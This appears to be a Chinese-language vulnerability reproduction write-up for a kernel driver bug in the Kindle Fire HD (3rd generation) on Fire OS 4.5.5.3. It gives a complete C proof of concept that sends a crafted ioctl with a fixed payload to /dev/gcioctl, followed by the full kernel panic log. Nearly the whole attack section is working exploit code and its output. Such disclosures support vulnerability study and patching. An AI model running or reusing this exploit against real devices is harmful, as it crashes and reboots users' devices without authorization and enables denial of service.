一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3的内核组件中的内核模块/omap/drivers/misc/gcx/gcioctl/gcif.c允许攻击者通过设备/ dev上ioctl的参数注入特制参数/ gcioctl使用命令3222560159,并导致内核崩溃。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/gcioctl causes the system crash via IOCTL 3222560159. 
 * This Poc should run with permission to do ioctl on /dev/gcioctl.
 *
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/gcioctl";
static command = 3222560159; 

int main(int argc, char **argv, char **env) {
        unsigned int payload[] = { 0x244085aa, 0x1a03e6ef, 0x000003f4, 0x00000000 };

        int fd = 0;

        fd = open(driver, O_RDONLY);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }

        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        if(ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }
        close(fd);
        return 0;
}

崩溃日志

[   79.825592] init: untracked pid 3232 exited
[   79.830841] init: untracked pid 3234 exited
[   95.970855] Alignment trap: not handling instruction e1953f9f at [<c06a4d84>]
[   95.978912] Unhandled fault: alignment exception (0x001) at 0x1a03e6f3
[   95.986053] Internal error: : 1 [#1] PREEMPT SMP ARM
[   95.991638] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[   95.999145] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[   96.006408] PC is at __raw_spin_lock_irqsave+0x38/0xb0
[   96.012115] LR is at _raw_spin_lock_irqsave+0x10/0x14
[   96.017791] pc : [<c06a4d88>]    lr : [<c06a4e10>]    psr: 20000093
[   96.017822] sp : d02bfdd8  ip : d02bfdf8  fp : d02bfdf4
[   96.030578] r10: 00000000  r9 : dd3eeca8  r8 : 00000001
[   96.036376] r7 : 1a03e6ef  r6 : 00000001  r5 : 1a03e6f3  r4 : d02be000
[   96.043701] r3 : 00000001  r2 : 00000001  r1 : 00000082  r0 : 20000013
[   96.050933] Flags: nzCv  IRQs off  FIQs on  Mode SVC_32  ISA ARM  Segment user
[   96.058990] Control: 10c5387d  Table: 96cb804a  DAC: 00000015
[   96.065460] 
[   96.065460] PC: 0xc06a4d08:
[   96.070404] 4d08  1a000003 eaffffe6 e5903000 e3530000 0affffe3 e5903004 e3530000 1afffff9
[   96.080810] 4d28  eaffffdf e50b0018 ebfffbab e51b0018 eaffffed e1a0c00d e92dd800 e24cb004
[   96.091217] 4d48  ebffffcf e89da800 e1a0c00d e92dd878 e24cb004 e1a0300d e3c34d7f e3c4403f
[   96.101776] 4d68  e1a05000 e3a06001 e5943004 e2833001 e5843004 e10f0000 f10c0080 e1953f9f
[   96.112335] 4d88  e3330000 01853f96 e3530000 0a000014 e121f000 e5943004 e2433001 e5843004
[   96.122894] 4da8  e5943000 e3130002 1a000010 e5953004 e3530000 e5953000 05856004 e3530000
[   96.133361] 4dc8  1a000003 eaffffe7 e5953000 e3530000 0affffe4 e5953004 e3530000 1afffff9
[   96.143920] 4de8  eaffffe0 f57ff05f e5853004 e89da878 ebfffb79 eaffffec e1a0c00d e92dd800
[   96.154479] 
[   96.154479] LR: 0xc06a4d90:
[   96.159393] 4d90  e3530000 0a000014 e121f000 e5943004 e2433001 e5843004 e5943000 e3130002
[   96.170013] 4db0  1a000010 e5953004 e3530000 e5953000 05856004 e3530000 1a000003 eaffffe7
[   96.180603] 4dd0  e5953000 e3530000 0affffe4 e5953004 e3530000 1afffff9 eaffffe0 f57ff05f
[   96.191070] 4df0  e5853004 e89da878 ebfffb79 eaffffec e1a0c00d e92dd800 e24cb004 ebffffcf
[   96.201690] 4e10  e89da800 e1a0c00d e92dd800 e24cb004 ebfffff6 e89da800 e1a0c00d e92dd800
[   96.212341] 4e30  e24cb004 ebfffff1 e89da800 e1a0c00d e92dd818 e24cb004 ebffffc0 e1a04000
[   96.222808] 4e50  ebe6a978 e121f004 e89da818 e1a0c00d e92dd800 e24cb004 ebfffff3 e89da800
[   96.233612] 4e70  e1a0c00d e92dd830 e24cb004 e24dd008 e1a0300d e3c34d7f e3c4403f e3a05001
[   96.244262] 
[   96.244262] SP: 0xd02bfd58:
[   96.249145] fd58  00000000 0000001d 00000004 d4736f80 d4737394 c06a4d84 20000093 ffffffff
[   96.259948] fd78  d02bfdc4 00000001 d02bfdf4 d02bfd90 c06a5318 c0008370 20000013 00000082
[   96.270660] fd98  00000001 00000001 d02be000 1a03e6f3 00000001 1a03e6ef 00000001 dd3eeca8
[   96.281311] fdb8  00000000 d02bfdf4 d02bfdf8 d02bfdd8 c06a4e10 c06a4d88 20000093 ffffffff
[   96.292053] fdd8  0000020a 00000082 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10 c06a4d5c
[   96.302825] fdf8  d02bfe14 d02bfe08 c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008 c06a4e20
[   96.313415] fe18  d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54 1a03e6ef
[   96.323883] fe38  bed24608 d02be000 d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe60
[   96.334533] 
[   96.334533] IP: 0xd02bfd78:
[   96.339416] fd78  d02bfdc4 00000001 d02bfdf4 d02bfd90 c06a5318 c0008370 20000013 00000082
[   96.349853] fd98  00000001 00000001 d02be000 1a03e6f3 00000001 1a03e6ef 00000001 dd3eeca8
[   96.360290] fdb8  00000000 d02bfdf4 d02bfdf8 d02bfdd8 c06a4e10 c06a4d88 20000093 ffffffff
[   96.370727] fdd8  0000020a 00000082 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10 c06a4d5c
[   96.381042] fdf8  d02bfe14 d02bfe08 c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008 c06a4e20
[   96.391479] fe18  d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54 1a03e6ef
[   96.402008] fe38  bed24608 d02be000 d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe60
[   96.412445] fe58  c06a319c c06a2fec d02bff04 d02bfe70 c0317c28 c06a3194 00000001 00000028
[   96.422790] 
[   96.422790] FP: 0xd02bfd74:
[   96.427795] fd74  ffffffff d02bfdc4 00000001 d02bfdf4 d02bfd90 c06a5318 c0008370 20000013
[   96.438140] fd94  00000082 00000001 00000001 d02be000 1a03e6f3 00000001 1a03e6ef 00000001
[   96.448699] fdb4  dd3eeca8 00000000 d02bfdf4 d02bfdf8 d02bfdd8 c06a4e10 c06a4d88 20000093
[   96.459289] fdd4  ffffffff 0000020a 00000082 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10
[   96.470031] fdf4  c06a4d5c d02bfe14 d02bfe08 c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008
[   96.480438] fe14  c06a4e20 d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54
[   96.490875] fe34  1a03e6ef bed24608 d02be000 d627f000 bed24608 dd3eeca8 00000000 d02bfe6c
[   96.501495] fe54  d02bfe60 c06a319c c06a2fec d02bff04 d02bfe70 c0317c28 c06a3194 00000001
[   96.512023] 
[   96.512023] R4: 0xd02bdf80:
[   96.517089] df80  000003ef 61ef22a8 61ef2278 61ef22d8 00000036 c0013e08 00000000 d02bdfa8
[   96.527679] dfa0  c0013c60 c0136578 61ef22a8 61ef2278 0000000a c0186201 65490ce8 65490ce0
[   96.538208] dfc0  61ef22a8 61ef2278 61ef22d8 00000036 00000001 65393000 6253ab8c 4010f2ec
[   96.548797] dfe0  00000001 65490cd0 400f0273 400e3804 600f0010 0000000a 5788f1b0 0000000b
[   96.559356] e000  00000002 00000003 00000000 d4736f80 c0a0e840 00000000 00000015 c4fcf880
[   96.569885] e020  00000000 d02be000 c09ddc50 d4736f80 dd0be600 c1617b40 d02bfdf4 d02bfd40
[   96.580535] e040  c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[   96.591125] e060  005bc4c0 5ebfea7f 00000000 00000000 00000000 00000000 00000000 00000000
[   96.601684] 
[   96.601684] R9: 0xdd3eec28:
[   96.606628] ec28  dd3eec28 dd3eec28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[   96.617218] ec48  00000000 00000000 dd3eec50 dd3eec50 00000000 c0aa5174 c0aa5174 c0aa5148
[   96.627716] ec68  5aefd4d7 00000000 00000000 00000000 dd3eec80 00000000 00000000 00000000
[   96.638275] ec88  00200000 00000000 00000000 dd3eec94 dd3eec94 dd3d6fc0 dd3d6fc0 00000000
[   96.648864] eca8  000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[   96.659423] ecc8  dd3eed80 dd33ae70 00001064 00000001 0fb00000 5aefd4d7 2d2b4d15 5aefd4d7
[   96.669921] ece8  2d2b4d15 5aefd4d7 2d2b4d15 00000000 00000000 00000000 00000000 00000000
[   96.680572] ed08  00000000 00000000 00000000 00000000 00000001 00000000 00000000 dd3eed24
[   96.691162] Process gcioctl_poc_3 (pid: 3395, stack limit = 0xd02be2f8)
[   96.698455] Stack: (0xd02bfdd8 to 0xd02c0000)
[   96.703430] fdc0:                                                       0000020a 00000082
[   96.712554] fde0: 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10 c06a4d5c d02bfe14 d02bfe08
[   96.721588] fe00: c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008 c06a4e20 d84a38d8 d84a2800
[   96.730743] fe20: d84a3800 0000000a d02be000 c33a3180 d02bfe54 1a03e6ef bed24608 d02be000
[   96.739837] fe40: d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe60 c06a319c c06a2fec
[   96.748840] fe60: d02bff04 d02bfe70 c0317c28 c06a3194 00000001 00000028 000fffff d02bfea0
[   96.757934] fe80: d02bfedc d02bfe90 c0207454 c00bd920 0000001e c33a3180 d02bfed4 d02bfea8
[   96.767059] fea0: 244085aa 1a03e6ef 000003f4 00000000 00000000 00000001 00000000 d02bff14
[   96.776214] fec0: 00000000 00000001 dd3eeca8 c24d8a00 d02bfefc d02bfee0 c02089fc 00000000
[   96.785247] fee0: d627f000 00000004 d627f000 bed24608 dd3eeca8 00000000 d02bff74 d02bff08
[   96.794403] ff00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[   96.803649] ff20: dcf8c770 d02bff0c d02be000 bed24638 bed24608 c0145d9f d627f000 00000004
[   96.812744] ff40: d02be000 00000000 d02bff64 00000000 bed24608 c0145d9f d627f000 00000004
[   96.821746] ff60: d02be000 00000000 d02bffa4 d02bff78 c01365e0 c0135fc4 00000000 00000000
[   96.830932] ff80: 00000400 bed24638 00010e54 00000000 00000036 c0013e08 00000000 d02bffa8
[   96.840118] ffa0: c0013c60 c0136578 bed24638 00010e54 00000004 c0145d9f bed24608 bed24608
[   96.849121] ffc0: bed24638 00010e54 00000000 00000036 00000000 00000000 00000000 bed24624
[   96.858245] ffe0: 00000000 bed245ec 00010690 0002917c 60000010 00000004 006f0063 002e006d
[   96.867340] Backtrace: 
[   96.870330] [<c06a4d50>] (__raw_spin_lock_irqsave+0x0/0xb0) from [<c06a4e10>] (_raw_spin_lock_irqsave+0x10/0x14)
[   96.881591]  r6:d02be000 r5:1a03e6f3 r4:00000082 r3:0000020a
[   96.888488] [<c06a4e00>] (_raw_spin_lock_irqsave+0x0/0x14) from [<c06a4e24>] (_raw_spin_lock_irq+0x10/0x14)
[   96.899291] [<c06a4e14>] (_raw_spin_lock_irq+0x0/0x14) from [<c06a3008>] (wait_for_common+0x28/0x150)
[   96.909729] [<c06a2fe0>] (wait_for_common+0x0/0x150) from [<c06a319c>] (wait_for_completion_interruptible_timeout+0x14/0x18)
[   96.922149] [<c06a3188>] (wait_for_completion_interruptible_timeout+0x0/0x18) from [<c0317c28>] (dev_ioctl+0x7ec/0x10c4)
[   96.934204] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[   96.943481] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[   96.952636] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[   96.961822]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e54 r4:bed24638
[   96.970153] Code: e5843004 e10f0000 f10c0080 e1953f9f (e3330000) 
[   96.977264] Board Information: 
[   96.977264]  Revision : 0001
[   96.977294]  Serial    : 0000000000000000
[   96.977294] SoC Information:
[   96.977294]  CPU    : OMAP4470
[   96.977294]  Rev    : ES1.0
[   96.977325]  Type    : HS
[   96.977325]  Production ID: 0002B975-000000CC
[   96.977325]  Die ID    : 1CC60000-50002FFF-0B00935D-11007004
[   96.977355] 
[   97.013824] ---[ end trace 2432291f2b5d99ba ]---
[   97.019195] Kernel panic - not syncing: Fatal exception
[   97.025024] CPU1: stopping
[   97.028137] Backtrace: 
[   97.031311] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[   97.040679]  r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[   97.047668] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[   97.056884] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[   97.066253] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5380>] (__irq_svc+0x40/0x70)
[   97.075561] Exception stack(0xd6cb7d28 to 0xd6cb7d70)
[   97.081237] 7d20:                   c1620b40 c3152ac0 d799dc70 00000000 00000000 c1620b40
[   97.090454] 7d40: d6cb6000 c4eaaf80 00000001 c4eaaf80 c1620b40 d6cb7d7c d6cb7d80 d6cb7d70
[   97.099670] 7d60: c0074004 c06a4880 60070013 ffffffff
[   97.105346]  r6:ffffffff r5:60070013 r4:c06a4880 r3:c0074004
[   97.112487] [<c06a485c>] (_raw_spin_unlock_irq+0x0/0x50) from [<c0074004>] (finish_task_switch+0x58/0x12c)
[   97.123321] [<c0073fac>] (finish_task_switch+0x0/0x12c) from [<c06a36fc>] (__schedule+0x3ec/0x830)
[   97.133239]  r8:c3152ac0 r7:c09ddc50 r6:d6cb6000 r5:c09b6b40 r4:c4fcf340
[   97.141143] r3:00000001
[   97.144500] [<c06a3310>] (__schedule+0x0/0x830) from [<c06a3c24>] (preempt_schedule+0x40/0x5c)
[   97.154174] [<c06a3be4>] (preempt_schedule+0x0/0x5c) from [<c06a4808>] (_raw_spin_unlock+0x48/0x4c)
[   97.164337]  r4:c0a7375c r3:00000002
[   97.168731] [<c06a47c0>] (_raw_spin_unlock+0x0/0x4c) from [<c00983d0>] (futex_wake+0xfc/0x130)
[   97.178436] [<c00982d4>] (futex_wake+0x0/0x130) from [<c0099868>] (do_futex+0xf8/0x9e8)
[   97.187469] [<c0099770>] (do_futex+0x0/0x9e8) from [<c009a1ec>] (sys_futex+0x94/0x178)
[   97.196289] [<c009a158>] (sys_futex+0x0/0x178) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[   97.205871] CPU0 PC (0) : 0xc003ee38
[   97.209930] CPU0 PC (1) : 0xc003ee54
[   97.214111] CPU0 PC (2) : 0xc003ee54
[   97.218170] CPU0 PC (3) : 0xc003ee54
[   97.222229] CPU0 PC (4) : 0xc003ee54
[   97.226409] CPU0 PC (5) : 0xc003ee54
[   97.230468] CPU0 PC (6) : 0xc003ee54
[   97.234527] CPU0 PC (7) : 0xc003ee54
[   97.238739] CPU0 PC (8) : 0xc003ee54
[   97.242767] CPU0 PC (9) : 0xc003ee54
[   97.246826] CPU1 PC (0) : 0xc0019b2c
[   97.251007] CPU1 PC (1) : 0xc0019b2c
[   97.255065] CPU1 PC (2) : 0xc0019b2c
[   97.259124] CPU1 PC (3) : 0xc0019b2c
[   97.263183] CPU1 PC (4) : 0xc0019b2c
[   97.267364] CPU1 PC (5) : 0xc0019b2c
[   97.271423] CPU1 PC (6) : 0xc0019b2c
[   97.275482] CPU1 PC (7) : 0xc0019b2c
[   97.279693] CPU1 PC (8) : 0xc0019b2c
[   97.283752] CPU1 PC (9) : 0xc0019b2c
[   97.287811] 
[   97.289581] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[   97.289611]